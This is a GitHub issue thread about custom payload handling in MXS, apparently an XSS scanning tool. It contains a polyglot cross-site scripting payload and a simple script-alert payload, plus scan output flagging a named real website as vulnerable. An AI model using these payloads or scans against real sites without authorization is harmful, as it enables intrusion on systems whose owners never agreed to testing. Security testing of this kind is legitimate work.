### ISSUE TITLE
custom payload not working!

### ISSUE THREAD

**Issue by blackcodersec** [sarperavci/MXS#6]
`python3 MXS.py -i list -c 10 -o out -t 15 -p '"><script>alert(1)</script>'`

```
Error loading payload file: "><script>alert(1)</script>
 [i] Starting scan with 10 concurrency
 [i] Output file: out
 [i] Timeout: 15.0 seconds
 [+] Vulnerable parameter found:  http://blankonthemap.free.fr/1_accueil/index.php?code=%22jaVasCript%3A/%2A-/%2A%60/%2A%5C%60/%2A%27/%2A%22/%2A%2A/%28/%2A%20%2A/oNcliCk%3Dalert%281%29%20%29////%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--%21%3E%3CsVg/%3CsVg/oNloAd%3Dalert%281%29//%3E%3E
 [i] Scanning finished. All URLs are saved to out
 [i] Total found: 1
 [i] Total scanned: 1
 [i] Time taken: 0 seconds
```

and `Vulnerable parameter found` is a false positive.

**Comment by M-Enes** [comment]
You should pass your payload file to -p parameter, not a string from stdin. Lets save your payload in a file and give that file's name to -p parameter.

**Comment by blackcodersec** [comment]
```
# cat payload.txt
"jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )////</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
```
With the same payload list not working!
```
# python3 MXS.py -i list -c 10 -o out -t 15 -p payload.txt
 [i] Starting scan with 10 concurrency
 [i] Output file: out
 [i] Timeout: 15.0 seconds
 [i] Scanning finished. All URLs are saved to out
 [i] Total found: 0
 [i] Total scanned: 1
 [i] Time taken: 0 seconds
```

without payload list working well, but sometimes showing false positives.
```
# python3 MXS.py -i list -c 10 -o out -t 15
 [i] Starting scan with 10 concurrency
 [i] Output file: out
 [i] Timeout: 15.0 seconds
 [+] Vulnerable parameter found:  http://blankonthemap.free.fr/1_accueil/index.php?code=%22jaVasCript%3A/%2A-/%2A%60/%2A%5C%60/%2A%27/%2A%22/%2A%2A/%28/%2A%20%2A/oNcliCk%3Dalert%281%29%20%29////%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--%21%3E%3CsVg/%3CsVg/oNloAd%3Dalert%281%29//%3E%3E
 [i] Scanning finished. All URLs are saved to out
 [i] Total found: 1
 [i] Total scanned: 1
 [i] Time taken: 0 seconds
```

**Comment by sarperavci** [comment]
> ```
> # cat payload.txt
> "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )////</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
> ```
> 
> With the same payload list not working!
> 
> ```
> # python3 MXS.py -i list -c 10 -o out -t 15 -p payload.txt
>  [i] Starting scan with 10 concurrency
>  [i] Output file: out
>  [i] Timeout: 15.0 seconds
>  [i] Scanning finished. All URLs are saved to out
>  [i] Total found: 0
>  [i] Total scanned: 1
>  [i] Time taken: 0 seconds
> ```
> 
> without payload list working well, but sometimes showing false positives.
> 
> ```
> # python3 MXS.py -i list -c 10 -o out -t 15
>  [i] Starting scan with 10 concurrency
>  [i] Output file: out
>  [i] Timeout: 15.0 seconds
>  [+] Vulnerable parameter found:  http://blankonthemap.free.fr/1_accueil/index.php?code=%22jaVasCript%3A/%2A-/%2A%60/%2A%5C%60/%2A%27/%2A%22/%2A%2A/%28/%2A%20%2A/oNcliCk%3Dalert%281%29%20%29////%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--%21%3E%3CsVg/%3CsVg/oNloAd%3Dalert%281%29//%3E%3E
>  [i] Scanning finished. All URLs are saved to out
>  [i] Total found: 1
>  [i] Total scanned: 1
>  [i] Time taken: 0 seconds
> ```

It's because reflection is in the `frame` tag, which is deprecated in HTML5. You should try another site.

**Comment by blackcodersec** [comment]
but the payload file is not working.

**Comment by M-Enes** [comment]
You are trying to find a vulnerability on the website uses deprecated tag.
So, your payload reflected (and found vulnerable by mxs) but it did not work because of browser support for old tags.
